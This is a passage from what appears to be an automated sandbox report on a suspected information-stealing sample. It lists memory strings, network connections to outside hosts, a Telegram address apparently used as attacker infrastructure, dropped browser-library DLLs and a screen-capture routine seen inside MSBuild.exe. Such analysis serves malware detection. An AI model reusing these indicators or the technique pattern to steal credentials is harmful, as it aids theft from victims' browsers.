                        Source: MSBuild.exe, 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe
                        Source: file.exe, 00000000.00000002.1692402449.0000000003A10000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1691045839.0000000002AD9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1692402449.00000000045A6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1692402449.000000000446A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1692402449.00000000039E3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, MSBuild.exe, 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/armad2a
                        Source: file.exe, 00000000.00000002.1692402449.0000000003A10000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1691045839.0000000002AD9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1692402449.00000000045A6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1692402449.000000000446A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1692402449.00000000039E3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/armad2ahellosqls.dllsqlite3.dllIn
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000017B8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, AAFBAK.4.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                        Source: MSBuild.exe, 00000004.00000002.2363277109.00000000267F9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2369809932.00000000326D3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2360020624.000000002088F000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2375510661.000000003E5B5000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: https://www.digicert.com/CPS0
                        Source: DAECFI.4.drString found in binary or memory: https://www.ecosia.org/newtab/
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000017B8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, AAFBAK.4.drString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                        Source: DAECFI.4.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                        Source: CBGCAF.4.drString found in binary or memory: https://www.mozilla.org
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2351862083.0000000019EBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                        Source: MSBuild.exe, 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/:
                        Source: CBGCAF.4.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2351862083.0000000019EBC000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/FIDHJKFCAF
                        Source: CBGCAF.4.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2351862083.0000000019EBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                        Source: CBGCAF.4.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
                        Source: CBGCAF.4.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2351862083.0000000019EBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                        Source: CBGCAF.4.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/l8dkvDNUUVWrkKclAGH309ds=ost.exe
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                        Source: unknownHTTPS traffic detected: 23.192.247.89:443 -> 192.168.2.4:49730 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 5.75.212.60:443 -> 192.168.2.4:49731 version: TLS 1.2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00411530 GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,4_2_00411530
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C58ED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset,4_2_6C58ED10
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C5CB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,4_2_6C5CB700
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C5CB8C0 rand_s,NtQueryVirtualMemory,4_2_6C5CB8C0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C5CB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,4_2_6C5CB910
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C56F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,4_2_6C56F280
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB90620_2_00FB9062
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FBB1DD0_2_00FBB1DD
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB95780_2_00FB9578
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB97BF0_2_00FB97BF
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_054625900_2_05462590
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05463D080_2_05463D08
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_054625820_2_05462582
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05463CC80_2_05463CC8
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_054600400_2_05460040
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0546001C0_2_0546001C
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0546131E0_2_0546131E
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_054613200_2_05461320
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_054A21060_2_054A2106
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_054A73500_2_054A7350
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_054ABF000_2_054ABF00
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_054A73400_2_054A7340
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_054A82880_2_054A8288
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_054A2C380_2_054A2C38
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_059B1B100_2_059B1B10
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_059B30360_2_059B3036
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_059B32010_2_059B3201
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0041BD504_2_0041BD50
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0041A1304_2_0041A130
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00419B584_2_00419B58
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00419B304_2_00419B30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C5635A04_2_6C5635A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C5D545C4_2_6C5D545C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C5754404_2_6C575440
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C5A5C104_2_6C5A5C10
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C5B2C104_2_6C5B2C10
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C5DAC004_2_6C5DAC00
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C5D542B4_2_6C5D542B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C58D4D04_2_6C58D4D0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C5764C04_2_6C5764C0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C5A6CF04_2_6C5A6CF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C56D4E04_2_6C56D4E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C576C804_2_6C576C80
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C5C34A04_2_6C5C34A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C5CC4A04_2_6C5CC4A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C58ED104_2_6C58ED10
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C5905124_2_6C590512
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C57FD004_2_6C57FD00
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C5A0DD04_2_6C5A0DD0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C5C85F04_2_6C5C85F0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C589E504_2_6C589E50
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C5A3E504_2_6C5A3E50
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C5B2E4E4_2_6C5B2E4E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C5846404_2_6C584640
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C56C6704_2_6C56C670
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C5D6E634_2_6C5D6E63
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C5A7E104_2_6C5A7E10
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C5B56004_2_6C5B5600
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C5C9E304_2_6C5C9E30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C56BEF04_2_6C56BEF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C57FEF04_2_6C57FEF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C5D76E34_2_6C5D76E3
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C585E904_2_6C585E90
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C5CE6804_2_6C5CE680
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C5C4EA04_2_6C5C4EA0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C5A77104_2_6C5A7710
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C579F004_2_6C579F00
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C596FF04_2_6C596FF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C56DFE04_2_6C56DFE0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C5B77A04_2_6C5B77A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C5888504_2_6C588850
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C58D8504_2_6C58D850
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C5AF0704_2_6C5AF070
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C5778104_2_6C577810
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C5AB8204_2_6C5AB820
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C5B48204_2_6C5B4820
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C5D50C74_2_6C5D50C7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C58C0E04_2_6C58C0E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C5A58E04_2_6C5A58E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C5960A04_2_6C5960A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C58A9404_2_6C58A940
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C5BB9704_2_6C5BB970
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C5DB1704_2_6C5DB170
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C57D9604_2_6C57D960
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C5A51904_2_6C5A5190
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C5C29904_2_6C5C2990
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C59D9B04_2_6C59D9B0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C56C9A04_2_6C56C9A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C5A9A604_2_6C5A9A60
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C5A8AC04_2_6C5A8AC0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C581AF04_2_6C581AF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C5AE2F04_2_6C5AE2F0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C5DBA904_2_6C5DBA90
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C57CAB04_2_6C57CAB0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C5D2AB04_2_6C5D2AB0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C5622A04_2_6C5622A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C594AA04_2_6C594AA0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C5653404_2_6C565340
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C57C3704_2_6C57C370
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C5AD3204_2_6C5AD320
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C5D53C84_2_6C5D53C8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C56F3804_2_6C56F380
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C61AC604_2_6C61AC60
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C6EAC304_2_6C6EAC30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C6D6C004_2_6C6D6C00
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C60ECC04_2_6C60ECC0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C66ECD04_2_6C66ECD0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C6DED704_2_6C6DED70
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C73AD504_2_6C73AD50
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C798D204_2_6C798D20
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C79CDC04_2_6C79CDC0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C614DB04_2_6C614DB0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C6A6D904_2_6C6A6D90
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C6AEE704_2_6C6AEE70
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C6F0E204_2_6C6F0E20
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C61AEC04_2_6C61AEC0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C6B0EC04_2_6C6B0EC0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C696E904_2_6C696E90
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C6D2F704_2_6C6D2F70
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C67EF404_2_6C67EF40
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C750F204_2_6C750F20
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C616F104_2_6C616F10
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C610FE04_2_6C610FE0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C6EEFF04_2_6C6EEFF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C758FB04_2_6C758FB0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C61EFB04_2_6C61EFB0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C6E48404_2_6C6E4840
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C6608204_2_6C660820
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C69A8204_2_6C69A820
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C7168E04_2_6C7168E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C6489604_2_6C648960
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C6669004_2_6C666900
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C72C9E04_2_6C72C9E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C6449F04_2_6C6449F0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C6A09A04_2_6C6A09A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C6CA9A04_2_6C6CA9A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C6D09B04_2_6C6D09B0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C68CA704_2_6C68CA70
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C6C8A304_2_6C6C8A30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C6BEA004_2_6C6BEA00
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C68EA804_2_6C68EA80
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C716BE04_2_6C716BE0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C6B0BA04_2_6C6B0BA0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C618BAC4_2_6C618BAC
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C6284604_2_6C628460
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C6744204_2_6C674420
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C69A4304_2_6C69A430
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C6564D04_2_6C6564D0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C6AA4D04_2_6C6AA4D0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C73A4804_2_6C73A480
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C6725604_2_6C672560
